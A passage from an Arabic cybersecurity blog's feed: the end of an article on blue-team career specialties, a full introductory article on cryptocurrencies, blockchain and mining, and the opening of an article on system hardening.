&lt;li&gt;&lt;strong&gt;جمع الأدلة الرقمية:&lt;/strong&gt; يتولى الخبير أو المحلل الجنائي الرقمي مهمة جمع البيانات من مصادر مختلفة، سواء كانت من أجهزة الكمبيوتر أو من الأجهزة اللوحية أو من الهواتف الذكية، مع الحرص والتأكد من سلامة الأدلة الرقمية وعدم التلاعب بها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحليل البيانات:&lt;/strong&gt; يقوم الخبير في هذا التخصص بتحليل البيانات باستخدام أدوات وبرامج خاصة لاستخلاص المعلومات المفيدة للتحقيق.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;استعادة البيانات:&lt;/strong&gt; استرجاع البيانات التي قد تم إخفاؤها أو حذفها باستخدام أحدث التقنيات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;كتابة التقارير:&lt;/strong&gt; بعد أن تتم عمليات جمع البيانات واستردادها وتحليلها، يقوم المحلل الجنائي الرقمي بكتابة تقرير مفصل وواضح عن الانتهاكات التي حصلت وعن جميع النتائج التي تم التوصل إليها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التعامل مع الجهات الحكومية:&lt;/strong&gt; في حال كان المحلل يعمل مع جهات حكومية، قد يتم استدعائه لتقديم تقريره أمام المحكمة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;5إدارة-الهوية-والوصول-iam-identity-and-access-management&quot;&gt;5.إدارة الهوية والوصول IAM (Identity and Access Management)&lt;/h3&gt;
&lt;p&gt;هذا التخصص من تخصصات الأمن السيبراني التي من الممكن أن تكون مفيدة للمختصين الجدد في مجال
الأمن السيبراني،فهو يركز على إدارة هوية المستخدمين و تحديد الصلاحيات المسموحة لكل مستخدم، بالإضافة
إلى إدارة الموارد وتحديد مستوى الصلاحيات وإمكانية الوصول إلى الموارد والخدمات الخاصة بالشركة.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-4&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إدارة الهوية:&lt;/strong&gt; هذه المهمة تُعنى بإنشاء هويات المستخدمين الرقمية، مع تحديد السمات والصفات الرئيسية لكل هوية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إدارة الوصول (الصلاحيات):&lt;/strong&gt; تحديد ما هو ممنوع وما هو مسموح لكل مستخدم.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الأمان:&lt;/strong&gt; التأكد من أن جميع المستخدمين ملتزمين بالضوابط الأمنية، كاختيار كلمات سر قوية وتفعيل المصادقة الثنائية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تقييم الصلاحيات:&lt;/strong&gt; التأكد من أن كل مستخدم يعمل ضمن الصلاحيات المسموحة ورصد جميع الحالات الشاذة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;6الاستجابة-للحوادث-الأمنية-incident-handling-and-response&quot;&gt;6.الاستجابة للحوادث الأمنية Incident Handling and Response&lt;/h3&gt;
&lt;p&gt;هذا التخصص هو جزء أساسي في الأمن السيبراني ويُعنى بتنفيذ التدابير والاستراتيجيات الفعالة للتعامل مع الاختراقات الأمنية. يعتبر خط الدفاع الأول للتصدي للهجمات الإلكترونية والتقليل من أضرارها. وتجدر الإشارة أن هذه المهمة ممكن أن تتم من قبل SOC Tier 2&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-5&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;التواصل مع الفريق:&lt;/strong&gt; عند حصول الاختراق يجب على المختص في هذا المجال أن يكون في تواصل مباشر ووثيق مع فريق الأمن السيبراني ومع فريق المعلوماتية في الشركة التي يعمل بها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;معرفة أدوار جميع الموظفين:&lt;/strong&gt; هذا التخصص يتطلب معرفة واسعة بأدوار الموظفين و مسؤولياتهم.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;وضع خطة استباقية لاحتواء الاختراق:&lt;/strong&gt; رسم خطة واضحة وسريعة التنفيذ لتحديد الآلية التي يجب العمل بها عند حدوث الاختراق.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الاستجابة الفورية:&lt;/strong&gt; في حال حدوث اختراق يجب على مٌستجيب الحوادث الأمنية أن يكون على أهب الاستعداد للاستجابة الفورية للاختراق مهما كان الوقت.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تقليل الضرر:&lt;/strong&gt; تنص هذه المهمة على أنه في حال حصل الاختراق فإنه من الضروري تقليل الأضرار الناجمة إلى أعلى حد.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;إعادة التأهيل:&lt;/strong&gt; محاولة استرجاع الملفات التي حُذفت أو التي قد تم إتلافها نتيجة الاختراق وإعادة النظام لحالة العمل الطبيعية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحديد الأسباب الناجمة عن الاختراق و الحد منها:&lt;/strong&gt; بعد حصول الاختراق، يقوم المُختص في هذا المجال بتحديد الثغرات التي أدت لحدوث الاختراق ويعمل على إغلاقها.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;7اصطياد-واكتشاف-التهديدات-threat-hunting&quot;&gt;7.اصطياد واكتشاف التهديدات Threat Hunting&lt;/h3&gt;
&lt;p&gt;هذا التخصص يتطلب معرفة كبيرة جداً و مهارات استثنائية، لأنه يركز على اكتشاف التهديدات والثغرات
الحاصلة في الشبكة أو في التطبيقات أو في أجهزة العقد النهائية (أجهزة المستخدمين – السيرفرات)، لاكتشاف التهديدات أو الهجمات التي تجاوزت أنظمة الحماية وتمكنت من الوصول للنظام.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-6&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الفحص الدائم:&lt;/strong&gt; يعمل على مراقبة البيئة بشكل دوري للبحث عن أي تهديد أو ثغرة أو اختراق لم يتم الكشف عنهم حتى الآن.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحليل السجلات:&lt;/strong&gt; يتم فحص جميع السجلات للكشف عن وجود أنماط غير اعتيادية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;مواكبة التطور:&lt;/strong&gt; البحث والاطلاع على أحدث تقنيات الاختراق لمعرفة طريقة عملها والعمل على التصدي المسبق لها.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;كتابة التقارير:&lt;/strong&gt; إن هذا التخصص يركز على كتابة التقارير والتوصيات المقترحة لتعزيز أساليب الحماية وتطبيق أحدث وأقوى تقنيات التصدي للهجمات الإلكترونية.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;8استخبارات-التهديد-threat-intelligence&quot;&gt;8.استخبارات التهديد Threat Intelligence&lt;/h3&gt;
&lt;p&gt;يعتبر هذا التخصص من التخصصات الممتعة جداً لمحبي البحث و المراقبة وجمع المعلومات. يركز هذا التخصص على جمع المعلومات عن المهاجمين ومجموعات الاختراق أو المنظمات التي توظف أشخاص للقيام بالهجمات السيبرانية. هذه المعلومات تتضمن تفاصيل عن المخترقين وعناوين IP المستخدمة من قبلهم، بالإضافة لدوافعهم وأهدافهم وأساليبهم. يتم استخدام هذه المعلومات لاكتشاف الهجمات ومنعها بشكل استباقي.&lt;/p&gt;
&lt;h3 id=&quot;بعض-المهام-الرئيسية-7&quot;&gt;بعض المهام الرئيسية&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;جمع المعلومات:&lt;/strong&gt; يقوم المختصون في هذا المجال في البحث العميق وراء المخترقين، إن كان في المنتديات والمواقع ضمن الإنترنت المظلم &lt;strong&gt;Dark Web&lt;/strong&gt; أو في المدونات، والبحث عن قواعد البيانات المسربة ومعلومات الاستخبارات مفتوحة المصدر &lt;strong&gt;OSINT&lt;/strong&gt; المتعلقة بالاختراقات و المنظمات السيبرانية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;حماية المؤسسة:&lt;/strong&gt; بعد البحث العميق وراء المخترقين، يقوم المختص في &lt;strong&gt;Threat Intelligence&lt;/strong&gt; بتنفيذ التدابير الأمنية اللازمة على المؤسسة التي يعمل بها بناءً على المعلومات المستفادة التي قد تم التوصل إليها للوصول إلى أعلى نسبة حماية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;العمل مع الجهات الأخرى:&lt;/strong&gt; في بعض الأحيان، وحسب توجهات الشركة أو المؤسسة التي يعمل بها هذا المُختص، يتم تبادل أحدث المعلومات التي قد تم التوصل لها مع الجهات الحليفة أو التي تسلك نفس سلوك المؤسسة، ويتم ربط جميع هذه المعلومات للخروج بمعلومات مفيدة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;البحث المستمر والتخفي:&lt;/strong&gt; تركز هذه المهمة على البحث بشكل روتيني لكن من دون الكشف عن الهوية، ومحاولة البقاء أطول فترة ممكنة في بيئة المخترقين.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h3&gt;
&lt;p&gt;هذه هي أشهر مجالات عمل الأمن السيبراني ضمن الفريق الأزرق، ومن المهم أن تدرك بأن هذه الأدوار والمهام ممكن أن تختلف بين شركة وأخرى. بشكل عام يعتبر الفريق الأزرق المكان المناسب لتحصل من خلاله على أول فرصة عمل في مجال الأمن السيبراني، لتتعرف على أنظمة وعمليات الحماية المختلفة ولتمتلك التصور الكامل حول هذا المجال. بعد ذلك، يمكنك تغيير لون القبعة الخاصة بك.&lt;/p&gt;
&lt;p&gt;لتبقى على اطلاع دائم بكل ما هو جديد في مجال الأمن السيبراني، انصحك بمتابعة &lt;a href=&quot;https://www.facebook.com/jameeltawelh/&quot;&gt;صفحة المهندس جميل حسين طويلة&lt;/a&gt; على الفيسبوك.&lt;/p&gt;
&lt;p&gt;أتمنى أن تكون هذه المعلومات مفيدة ومساعدة لك لكي تبدأ مسيرتك الاحترافية في هذه المجال.&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>الأمن السيبراني</category><category>الفريق الأزرق</category><category>SOC</category><category>تخصصات الأمن السيبراني</category><category>التحليل الجنائي الرقمي</category></item><item><title>العملات الرقمية – ماذا تعرف عنها؟</title><link>https://blog.cyberpedia.site/cryptocurrencies/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cryptocurrencies/</guid><description>تعرّف إلى أشكال العملات الرقمية اللامركزية والمركزية، وآلية عمل البلوكشين والتعدين، والعوامل المؤثرة في أسعارها، ودور الأمن السيبراني في حمايتها.</description><pubDate>Sat, 27 Apr 2024 23:20:36 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;العملات الرقمية اللامركزية مثل البتكوين والإيثيريوم عملات افتراضية لا تصدرها جهة مركزية، بينما تصدر البنوك المركزية عملات رقمية مركزية (CBDCs). تعمل العملات المشفرة بتقنية البلوكشين القائمة على السجل الموزع وشبكة الند للند وآلية التوافق والتشفير، وتتأثر أسعارها بالأمان والتضخم والسياسة والإعلام والعرض والطلب والتعدين.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;لا شك أنك من الأشخاص الذين سمعوا عن العملات الرقمية | Cryptocurrencies ، ففي عالم رقمي محاط بالتكنولوجيا السريعة ووسائل الإعلام بات الأمر مستحيلاً أن تغيب عنك هذه المعلومات.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في هذا المقال سنغوص في هذا العالم الرقمي وسنوضح لك المفاهيم العامة والخاصة في العملات المشفرة وسنقدم لك بعضاً من أهم النصائح والإرشادات ضمن هذه الساحة الافتراضية.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;أولاً--الأشكال-الرقمية-للعملات&quot;&gt;أولاً – الأشكال الرقمية للعملات&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;البنوك&lt;/strong&gt;
تتعامل مع حسابات أو سجلات رقمية للأفراد مع تمثيل رقمي للأموال وتخزينها وإدارتها بشكل إلكتروني ويتمثل هذا الأمر بنظام البطاقات المصرفية التقليدية لدى البنوك سواء بشكل محلي أو عالمي.&lt;/p&gt;
&lt;p&gt;وبالتأكيد فإن هذه السجلات تكون خاضعة لرقابة البنك والدولة مع وجود وسيط (طرف ثالث Third Party) يكون مراقباً ومشرفاً على العمليات التي تتم ؛ مما يسمح بتتبع أنشطة الأفراد.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;العملات الرقمية اللامركزية ( أو العملات المشفرة ) Cryptocurrencies&lt;/strong&gt;
هي عملات افتراضية غير ملموسة ولاتكون صادرة عن جهة مركزية كالبنوك المركزية وتكون على شكل سوق حر على الإنترنت لا يخضع لوسيط مشرف على العمليات التي تتم كما في البنوك العادية ولا تشرف ولا تؤثر عليها الحكومات بشكل مباشر.&lt;/p&gt;
&lt;p&gt;مثل :
البتكوين Bitcoin / الإيثيريوم Ethereum / سولانا Solana / لايتكوين Litecoin / وغيرها الكثير… يوجد حوالي أكثر من 6 آلاف عملة رقمية لامركزية.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;العملات الرقمية المركزية Central Bank Digital Currencies (CBDCs)&lt;/strong&gt;
نوع جديد من العملات المشفرة، إنما هي صادرة عن البنوك المركزية وتكون مستقلة عن عملاتها الورقية، ينظم المصرف أو البنك آلية العمل بها وهي تساهم بتقييد المعاملات غير القانونية في الأصول المشفرة.&lt;/p&gt;
&lt;p&gt;مثل :
Enaira – العملة الرقمية المركزية لنيجيريا
إن إطلاق ال (USD-CBDCs) في الولايات المتحدة لا يزال موضوعاً قيد الدراسة.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;ثانياً--آلية-عمل-العملات-الرقمية-المشفرة&quot;&gt;ثانياً – آلية عمل العملات الرقمية المشفرة&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;تعمل العملات المشفرة أساساً وفق تقنية واحدة وهي البلوكشين (Blockchain)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;قد يكون الحال أنك سمعت عنها من قبل ، فما هي العناصر التي ترتكز عليها هذه التقنية …&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;العناصر الأربعة لتقنية البلوكشين: السجل الموزع وشبكة الند للند وآلية التوافق والتشفير&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.dzBxsot9_Z1QrewP.webp&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;الطرف (السجل) المُوزَّع Distributed Ledger
تسمى أيضاً سجل التوزيع Shared Ledger
كما يتضح من الاسم ذاته فهي طريقة مبتكرة وفريدة في هيكلة البيانات ؛ إذ أن سجلات البيانات بدلاً من تواجدها على جهاز حاسوب واحد مركزي كما هو المعتاد ؛ فإنه يتم توزيعها على شبكة من الحواسيب (العقد) المتصلة مع بعضها البعض (سنوضح هذه التفاصيل بشكل لاحق).&lt;/p&gt;
&lt;p&gt;لهذا التقنية عدة استخدامات أبرزها في العملات الرقمية والعقود الذكية.
(تعد العملات الرقمية المثال الأكثر شيوعاً عن العقود الذكية)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;شبكة الند-للند Peer to Peer Network (P2P)
وهي شبكة تقوم على مشاركة الملفات بين الأجهزة مباشرةً و/أو بشكل جماعي دون وجود خادم (Server) مركزي لتشغيل الشبكة.
تتكون من عدد من الحواسيب (مئات أو ملايين) ، موزعة في جميع أنحاء العالم ، تتواصل مع بعضها البعض بنفس البروتوكولات ، مكونة بمجموعها شبكة كاملة مترابطة لتبادل البيانات.&lt;/p&gt;
&lt;p&gt;تستخدم بروتوكولات LibP2P التي تعد ضرورية لبناء البلوكشين وهي مكتبة مفتوحة المصدر تشمل بروتوكولاتها على العديد من الوظائف ، أبرزها :
اكتشاف العقدة وتحديدها ، التواصل مع العقدة ، نقل البيانات ، تخزين البيانات
ونذكر أن عمليات هذه البروتوكولات تتم بشكل لامركزي.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;آلية التوافق Consensus Mechanism
وتسمى أيضاً ب خوارزميات الإجماع Consensus Algorithms / بروتوكولات الإجماع Consensus Protocols
وهي العمليات التي من خلالها يتم التحقق من المعاملات والسجلات الصالحة وأيها غير الصالحة بواسطة مجموعة من النظراء أو العقد (peers ~ nodes) الموجودة على الشبكة.
يوجد العديد منها ، إلا أن أشهرها هي : PoW و PoS
تحافظ هذه الخوارزميات على أمان هيكل البلوكشين من التلاعب.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;التشفير Cryptography
يلعب التشفير الدور الأهم والأكبر في تقنية البلوكشين ، إذ يؤمن حماية البيانات والمعاملات بين العُقَدْ (Peers ~ Nodes) الموجودة على الشبكة.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;ثالثاً--العوامل-المؤثرة-في-العملات-الرقمية&quot;&gt;ثالثاً – العوامل المؤثرة في العملات الرقمية&lt;/h2&gt;
&lt;p&gt;تسببت جائحة كورونا في أزمة اقتصادية على مستوى العالم وأدت إلى ركود في حركة السوق وتوقف التجارة والمعاملات المصرفية ؛ نتج عنها ارتفاع سعر العملات الرقمية بنسبة تتجاوز 1200% !&lt;/p&gt;
&lt;p&gt;فما هي العوامل التي تؤثر على العملات المشفرة ؟&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;الأمان والحماية
عندما يفكر أي شخص بالاستثمار أو التداول الرقمي ؛ فإن الفكرة الأولى التي ستتبادر على ذهنه هي عامل الأمان ؛ لذلك تنفق عليه المنصات مبالغ طائلة لأجل حماية منصاتها وبياناتها ومستخدميها من الغش والاحتيال والتلاعب ؛ مما يزيد الوثوقية لدى العميل في المنصة.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;التضخم الاقتصادي
إن أبسط مفهوم للتضخم هو الفرق بين أسعار سوق السلع بين اليوم والأمس ، يتعلق بالفوائد والضرائب ودخل الفرد ، أسعار النفط والغاز والذهب ، ومعدلات البطالة ، أي باختصار…
جميع العوامل التي تؤثر في قيمة العملات الحقيقية في السوق وتجعلها أقل جاذبية ؛ تدفع الأفراد للاستثمار الرقمي.
مثلاً..
تقارير الاحتياطي الفيدرالي الأمريكي في خفض قيمة الفائدة يتبعها ارتفاع أسعار العملات الرقمية والعكس صحيح.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;التغيرات السياسية والعسكرية
الحروب الاقتصادية والعسكرية بين الدول والتنافس في البورصات يسبب ركوداً في حركة السوق والإنتاج والتجارة والاقتصاد.
مثلاً..
في الأزمة الاقتصادية عام 2008 استفادت الصين من هذا الركود محققةً أرباحاً ضخمة ونفس السيناريو تكرر في جائحة كوفيد-19 وفي المقابل تكبدت الولايات المتحدة خسارات اقتصادية كبيرة.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;الأخبار ووسائل الإعلام
يتأثر حكم الناس واتخاذ قراراتهم تبعاً للمعطيات التي لديهم والتي يستمدونها بشكل مباشرة من الضجيج الإعلامي على قنوات الأخبار ووسائل التواصل الاجتماعي وكذلك تصريحات المسؤولين العاملين في المنصات الرقمية أو المصارف المركزية في الاحتياطي الفيدرالي الأمريكي أو البنك المركزي الأوروبي.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;العامل الزمني&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;“الوقت من بتكوين”&lt;/strong&gt;&lt;/em&gt; ، قد تكون سمعت عن مقولة &lt;em&gt;&lt;strong&gt;“الوقت من ذهب”&lt;/strong&gt;&lt;/em&gt; لكن ماذا عن &lt;em&gt;&lt;strong&gt;“الوقت من البتكوين”&lt;/strong&gt;&lt;/em&gt; ؟&lt;/p&gt;
&lt;p&gt;إن أي تأخير زمني قدره ثانية فقط سيكلف الملايين من العملاء عبر العالم أموالاً وخسارات هائلة ، لذلك السرعة ضرورية في هذا المجال ؛ لمعالجة البيانات وتسجيل المعاملات
ويمكن تفقد سوق العملات الرقمية عبر &lt;a href=&quot;https://exchange.gemini.com/trade/BTCUSD?_gl=1*1aoz5wt*_gcl_au*ODE1Njc4ODQyLjE3MTA1NDM3NDE.*_ga*MTQ3NDYxNjg4NS4xNzEwNTQzNzQz*_ga_8GNNSS2GRV*MTcxMDgxNzk2NS41LjEuMTcxMDgyMDkwNi41Mi4wLjA&quot;&gt;&lt;strong&gt;الرابط&lt;/strong&gt;&lt;/a&gt; ومراقبة تغيرات مؤشراته لحظة بلحظة لإدراك مدى أهمية الأمر..&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;التغير في العرض والطلب
بسبب عمليات تنصيف البتكوين والتي تحدث مرة كل أربع سنوات تقريباً.&lt;/p&gt;
&lt;p&gt;وهي العملية التي ينخفض فيها قيمة مكافأة تعدين الكتل الجديدة ؛ لأن طرح عملات بشكل كبير يؤدي لانخفاض قيمة العملة.
من المتوقع أن يكون عدد عملات البتكوين في العالم 21M BTC مليون عملة بتكوين فقط.&lt;/p&gt;
&lt;p&gt;من المتوقع أن يتوقف إنتاج عملات البتكوين بحلول عام 2140&lt;/p&gt;
&lt;p&gt;مثلاً..
في إبريل عام 2024 جرى تنصيف للبتكوين رافقه قبل ذلك في 2023 زيادة من قيمة 5K$ إلى 70K$&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;عمليات التعدين
وهي العملية التي يقوم بها المعدّنون (Miners) من أجل تأكيد المعاملات والإجراءات التي تتم في السلسلة ، وإضافتها إلى الكتلة ، أو إضافة كتل جديدة لسلسة البلوكشين.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;كيف-يتم-التعدين-mining&quot;&gt;كيف يتم التعدين (Mining)؟&lt;/h3&gt;
&lt;p&gt;&lt;img alt=&quot;مراحل التعدين: طلب المعاملة ثم توزيعها على المعدّنين ثم حل التجزئة والتحقق ثم إضافة الكتلة إلى السلسلة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.DEFNtf-W_Z1L0Ipl.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بشكل مختصر تتلخّص العملية وفق الآتي :&lt;/strong&gt;
بدايةً يتم طلب المعاملة من قبل المستخدم العادي عبر الشبكة ، ثم يتم توزيع الطلب عبر شبكة البلوكشين إلى &lt;strong&gt;المعدّنين (Miners)&lt;/strong&gt;
هنا يأتي دور العتاد الحاسوبي ذو الكفاءة الأكبر ؛ إذ صاحب القوة الحاسوبية الأكبر والأقوى سيكون بالتأكيد الأسرع من أجل تنفيذ الخوارزمية و حل المعادلة الحسابية المعقدة والتي تسمى &lt;strong&gt;بالتجزئة (Hashing)&lt;/strong&gt; أو &lt;strong&gt;خاصية التجزئة (Hashing Function).&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;يقوم هذا الحاسوب بالتحقق من جميع المعاملات الرقمية التي تمت في السلسلة
وفي حالة صحة المعاملة ، يتم إضافة الكتلة إلى السلسلة أو دفتر الأستاذ العام ، وتصبح جزءاً منه بشكل دائم لا يمكن تغييرها أو حذفها.&lt;/p&gt;
&lt;p&gt;قد يستعين المعدّنون بعتاد حاسوبي قوي ، أو يكونون على شكل مجموعات أو مدعومين من قبل شركاتهم ، وخاصة تلك التي تقدم خدمات &lt;a href=&quot;https://blog.cyberpedia.site/cloud-computing/&quot;&gt;&lt;strong&gt;الحوسبة السحابية&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;رابعاً--الأمن-السيبراني-ومطورو-البلوكشين-cybersecurity--blockchain-developers&quot;&gt;رابعاً – الأمن السيبراني ومطورو البلوكشين (Cybersecurity &amp;amp; Blockchain Developers)&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;مطورو البلوكشين وخبراء الأمن السيبراني يتعاونون في تحليل الثغرات والاستجابة للحوادث الأمنية وتطوير هيكلية البيانات&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.B6iH6AFa_Z1GO6k4.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;كون التعامل في الأسواق الرقمية يعد أمراً بالغ الحساسية والأهمية ؛ تزداد معه المخاطر بشكل طردي.
ومع زيادة في قواعد البيانات أكثر فأكثر وتعقيدها وتشعبها ، يلزمها الحماية من المخاطر والثغرات الأمنية والهجمات السيبرانية والتصدي لها من محاولات السرقة والتلاعب والاختراق.&lt;/p&gt;
&lt;p&gt;يعمل مطورو البلوكشين يداً بيد مع خبراء الأمن السيبراني في تأمين منصاتهم الرقمية وقواعد البيانات الكتلية ، سواء من تحليل الثغرات ، أو الاستجابة للحوادث الأمنية ، تطوير هيكلية البيانات من قبل مطوريها.&lt;/p&gt;
&lt;h2 id=&quot;أخيراً&quot;&gt;أخيراً..&lt;/h2&gt;
&lt;p&gt;إن التلاعب ببيانات سلسلة الكتل أمر صعب وهذا إن لم يكن مستحيلاً ، إذ تعدد طبقات الأمان في هيكليتها وآلية عملها يعزز كفائتها وحمايتها على الشبكة.&lt;/p&gt;
&lt;p&gt;وفي النهاية..
يعد هذا المجال ترند العصر الحالي ، سريع التطور وضخم جداً وبشكل عام الأكثر تعقيداً ولكن الأفضل أماناً للبيانات والأفضل موثوقية في التعامل بآنٍ معاً&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;إذ عاملي الفعالية والوثوقية هما العاملين الأساسيين الذين يُجرى عليهم التطوير والتحسين بشكل مستمر يومياً في أي نظام تقني في عالم التكنولوجيا.&lt;/strong&gt;&lt;/p&gt;
</content:encoded><category>العملات الرقمية</category><category>العملات الرقمية</category><category>البلوكشين</category><category>البتكوين</category><category>التعدين</category><category>العملات المشفرة</category></item><item><title>Cybersecurity Hardening النهج الاستباقي لحماية الأنظمة</title><link>https://blog.cyberpedia.site/cybersecurity-hardening/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cybersecurity-hardening/</guid><description>ما هو Cybersecurity Hardening وأنواعه، مع عشر ممارسات عملية لتشديد حماية الأنظمة: التحديثات وتقييد الصلاحيات والتشفير والنسخ الاحتياطي والتوعية.</description><pubDate>Mon, 22 Apr 2024 08:55:07 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Cybersecurity Hardening مجموعة ممارسات تهدف إلى تقليل سطح الهجوم على النظام وتقوية مقاومته للهجمات، وتشمل تشديد أنظمة التشغيل والسيرفرات والشبكات والسحابة. أبرز ممارساته تثبيت التحديثات وتقييد الصلاحيات وتعطيل الخدمات غير الضرورية والجدران النارية والتشفير والنسخ الاحتياطي والمراقبة وتوعية المستخدمين.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في عالم رقمي يزداد تعقيداً، أصبح &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; حاجة ضرورية أكثر من أي وقت مضى، في السنوات السابقة كانت معظم الشركات تعتبر الأمن السيبراني رفاهية ولا حاجة للاستثمار به ولكن مع ازدياد عدد التهديدات الإلكترونية وازدياد النشاط الإجرامي على شبكة الانترنت وتطور مهارات وأساليب مجرمي الانترنت أصبح من الضروري اتخاذ خطوات استباقية proactive لحماية أنظمتنا وبياناتنا&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;الأمن السيبراني في يومنا الحالي أصبح ضرورة وليس رفاهية&lt;/p&gt;
&lt;p&gt;وهذا الأمر على جميع المستويات: على مستوى الأفراد والشركات وحتى على مستوى الدول&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;في هذا المقال، سنناقش مفهوم Cybersecurity Hardening وسنقدم لكم أفضل الممارسات الأمنية والخطوات العملية التي يجب تطبيقها على الأنظمة والشبكات لضمان الحماية الفعالة ضد التهديدات الأمنية الرقمية&lt;/p&gt;
&lt;p&gt;تعتبر عملية Cybersecurity Hardening نهجاً شاملاً لتعزيز حماية أنظمة المعلومات من خلال مجموعة من الممارسات والتقنيات.&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-مفهوم-cybersecurity-hardening&quot;&gt;ما هو مفهوم Cybersecurity Hardening؟&lt;/h2&gt;
&lt;p&gt;كلمة “Hardening” يمكن ترجمتها بمعنى تشديد أو تأمين أو تقوية ويشير هذا المصطلح إلى مجموعة من الممارسات والإجراءات التي تهدف إلى تقليل سطح الهجوم على نظام ما وتحسين قدرته على مقاومة الهجمات الإلكترونية &lt;strong&gt;ويشمل على عدة أنواع:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Operating systems hardening&lt;/li&gt;
&lt;li&gt;Servers hardening&lt;/li&gt;
&lt;li&gt;Network hardening&lt;/li&gt;
&lt;li&gt;Cloud hardening&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;تخيل ما سيحدث في حال تعرضك لهجوم إلكتروني، على المستوى الشخصي سيتم تشفير بياناتك ومنعك من الوصول لملفاتك وابتزازك وطلب فدية مالية منك وعلى مستوى الشركات سيتم تسريب معلومات العملاء ومواجهة مشاكل قانونية والتأثير على سمعة الشركة، كما أن العديد من الهجمات من الممكن أن تؤدي لإيقاف الأنظمة وبالتالي التأثير على استمرارية الأعمال.&lt;/p&gt;
